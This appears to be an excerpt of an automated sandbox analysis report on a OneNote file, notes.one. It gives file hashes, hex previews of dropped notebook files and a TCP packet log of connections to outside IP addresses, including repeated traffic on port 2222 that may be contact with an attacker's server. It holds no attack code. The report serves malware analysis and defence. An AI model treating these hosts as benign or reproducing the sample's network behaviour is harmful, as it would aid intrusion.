SHA-512:	D41EC82C394E14B2BBA27BD3ADCF1AF98771974B58C487C656929C47D68E45D479913EC8395AA1DFED4A53872CA6FD5A7B44F0076B6085C44460249B44B765AF
Malicious:	false
Preview:	L..................F.... ...../.........!;..../.....0.......................3....P.O. .:i.....+00.../C:\.....................1.....6Sto..PROGRA~1..t......O.IGVD......o..............J.......4.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....j.1.....6S.S..MICROS~2..R......6S.SGV......y2........................M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....N.1.....6S.S..root..:......6S.SGV......."....................x...r.o.o.t.....Z.1.....6S.S..Office16..B......6S.SGV......@1.....................D..O.f.f.i.c.e.1.6.....f.2.0...6S.S .ONENOTEM.EXE..J......6S.SGV.......!.....................p..O.N.E.N.O.T.E.M...E.X.E.......k...............-.......j...........[........C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE....S.e.n.d. .t.o. .O.n.e.N.o.t.e.T.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E.M...E.X.E.../.t.s.r.........&................c^...NI..e.2...

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	6184
Entropy (8bit):	1.231338150939114
Encrypted:	false
SSDEEP:	12:RanTYyfi/U/+pOe4QFFBtaJlCWn+J/J3Ryd1EXIxAS0H1D63cVA+A9Qt7QZIB:YTYyf1Fe4+tUlCff3RkECAS0V2sVAXK5
MD5:	61F70B19ABFD6E73BA42D41C22CE2F54
SHA1:	20CAF059699BD2B4B21E2C8BC8280A8E44C96A6E
SHA-256:	BB350BD0B3CE13C787D377E4A97C2828E78BFC8CFBDBD16AF96582C6BF0F8E7D
SHA-512:	CDFAA794B6B298372475152C39FD8F875544C4B31E863633E5F93214D479C19F15A8CFDA9759B840E37E21EAC356153B9387DC1DB67D02DCFF5D45F242D0E223
Malicious:	false
Preview:	./.C..vL....W"v_../%&!A.8.T..L................?.....I...............................................................................................................h...........................(................vrI.)MK..B.{.E..........3.a...O.rB...@.............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Documents\OneNote Notebooks\My Notebook\Quick Notes.one

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	5272
Entropy (8bit):	1.336274277917338
Encrypted:	false
SSDEEP:	12:lEtYyfnju2UP4pFFBtvsjlVstO/mIhZ6fwCfB01hEtvgkC:lOYyfn+wDt03stRIhZ2wBUvgD
MD5:	A16643E84E0215216956F23363D65710
SHA1:	FFB336F328F1D0740A7FDB74764602BDA14C2950
SHA-256:	405E56666192F2C48D9A48FF85FD117E9D1ABC78318DFD7771C26BAA94E702D7
SHA-512:	5E5AD691332BB6B68DC3CD86C33A50E26562BDE35C03C663B7EBC1FFAFF1D131BB506FED8B734546DEF7038409CDE0D7B3205F0EEA38CC4FFEDE015CE5F92A1A
Malicious:	false
Preview:	.R\{..M..Sx.)...5.$F.G.kC.?...................?.....I...................................................................../%&!A.8.T..L0.......................h...........................................}.!NM..N..M. .Uk..........._u..N..m................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	data
Entropy (8bit):	5.7530821194914035
TrID:	Microsoft OneNote note (16024/2) 100.00%
File name:	notes.one
File size:	159160
MD5:	f37c173417e5c9d9264f00cc6ec0e924
SHA1:	552bdc49b09a566ded145d5befaa9e8623aaa3f2
SHA256:	ca0ee9618e132e177e54276defa733a0338123c73ca880e031f814c0936d703b
SHA512:	aa810748312fbd4ff64f117d750e031a4d1457ace66d84e29e74eb043c1fd157004f4e977444b91997a9ae44f568fe033fafec1f9737ea0ab393b5da14e93ec6
SSDEEP:	1536:YevY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7P2x0R6Zoj:PgS2EJbyYeMYkKkyX3DWvLLATijRgoj
TLSH:	BFF3D026B181865ACB2A417909E76F747373BE029591271FDFB62E2C5DF0288CC9468F
File Content Preview:	.R\{...M..Sx.)..5._....O....7...................?......I........................................................................................@...................h...............8f......0....m...............n.....I..&.....7........R..@..N.&..5......

File Icon


Icon Hash:	d4dce0626664606c

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 7, 2023 18:26:32.051937103 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.052026987 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.052234888 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.063653946 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.063724041 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.307496071 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.307786942 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.309437990 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.309457064 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.309871912 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.333930969 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.376374006 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.663856983 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.663990021 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.664356947 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.664403915 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.712025881 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.763931990 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.763964891 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.764178991 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.764225960 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.768805981 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.768908978 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.768953085 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.768970966 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.768971920 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.768971920 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.769082069 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.769114017 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.769200087 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.821631908 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.870296955 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.870337009 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.870517969 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.870579004 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.870603085 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.870729923 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.870906115 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.870949984 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.871082067 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871082067 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871107101 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.871118069 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871119022 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871264935 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871542931 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.871577978 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.871726990 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871726990 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871778965 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871788979 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.871829033 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871853113 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.871949911 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.962707043 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.962727070 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.962873936 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.962929964 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.962929964 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.962934971 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.963047028 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.973378897 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.973400116 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.973541021 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.973541021 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.973551035 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.973589897 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.973589897 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.973686934 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.977708101 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.977727890 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.977853060 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.977900982 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.977900982 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.977905989 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.977950096 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.977950096 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.978049994 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.982342005 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.982361078 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.982558966 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.982564926 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.982640028 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.982712030 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986486912 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.986505985 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.986635923 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986635923 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986684084 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986684084 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986689091 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.986732960 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.986830950 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.989825010 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.989842892 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.990083933 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.990083933 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:32.990092993 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:32.990230083 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.063062906 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.063083887 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.063368082 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.063368082 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.063399076 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.063627005 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.067059994 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.067086935 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.067219019 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.067219019 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.067229033 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.067320108 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.067388058 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.072701931 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.072734118 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.072926044 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.073023081 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.073071957 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.073081017 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.073169947 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.073267937 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.076735973 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.076761007 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.076879025 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.076925039 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.076925039 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.076936960 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.076972961 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.076973915 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.077080011 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.082187891 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.082211971 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.082365036 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.082365036 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.082381964 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.082411051 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.082509041 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.082557917 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.087826967 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.087861061 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.088025093 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.088072062 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.088079929 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.088123083 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.088231087 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.092730045 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.092755079 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.092904091 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.092992067 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.093000889 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.093040943 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.093163967 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127187967 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127233028 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127517939 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127540112 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127599955 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127654076 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127753973 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127777100 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127815008 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127876997 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127913952 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.127931118 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.127947092 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128042936 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128120899 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128140926 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128283024 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128348112 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128390074 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128489971 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128490925 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128537893 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128552914 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128587008 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128587008 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128670931 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128686905 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128705025 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128755093 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128815889 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128815889 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128863096 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128876925 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.128911972 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.128911972 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.129010916 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.131701946 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.160156012 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.160182953 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.160372019 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.160372019 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.160398960 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.160490990 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.160604000 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.165688038 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.165765047 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.165851116 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.165851116 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.165899992 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.165899992 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.165925980 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.165963888 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.166069031 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.171143055 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.171209097 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.171356916 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.171416998 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.171461105 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.171461105 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.171577930 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.175108910 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.175230026 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.175286055 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.175333977 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.175353050 CET	443	49839	144.217.139.27	192.168.11.20
Feb 7, 2023 18:26:33.175407887 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.175497055 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:26:33.189693928 CET	49839	443	192.168.11.20	144.217.139.27
Feb 7, 2023 18:30:10.762573004 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:10.762695074 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:10.762888908 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:10.768162012 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:10.768240929 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.213197947 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.213367939 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.213444948 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.260540962 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.260610104 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.261610031 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.261761904 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.264265060 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.304395914 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.399552107 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.399749994 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.399786949 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.399837017 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.399866104 CET	443	49850	72.163.4.185	192.168.11.20
Feb 7, 2023 18:30:11.399900913 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.400006056 CET	49850	443	192.168.11.20	72.163.4.185
Feb 7, 2023 18:30:11.558518887 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.609345913 CET	2222	49852	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:11.609683037 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.609841108 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.667471886 CET	2222	49852	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:11.667696953 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.678510904 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.728745937 CET	2222	49852	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:11.728965998 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.729243994 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:11.833677053 CET	2222	49852	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:11.866035938 CET	2222	49852	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:11.866189957 CET	49852	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.476207018 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.527987957 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.528167963 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.528414965 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.580735922 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.580919981 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.581155062 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.583919048 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.584009886 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.584073067 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.635186911 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.635243893 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.635350943 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.635407925 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.635551929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.635735989 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.635900021 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.636050940 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.636276960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.636502028 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687150002 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.687206984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.687305927 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687362909 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687427044 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687587023 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687587023 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687612057 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.687665939 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.687705994 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.687824011 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.687998056 CET	49855	2222	192.168.11.20	92.177.204.2
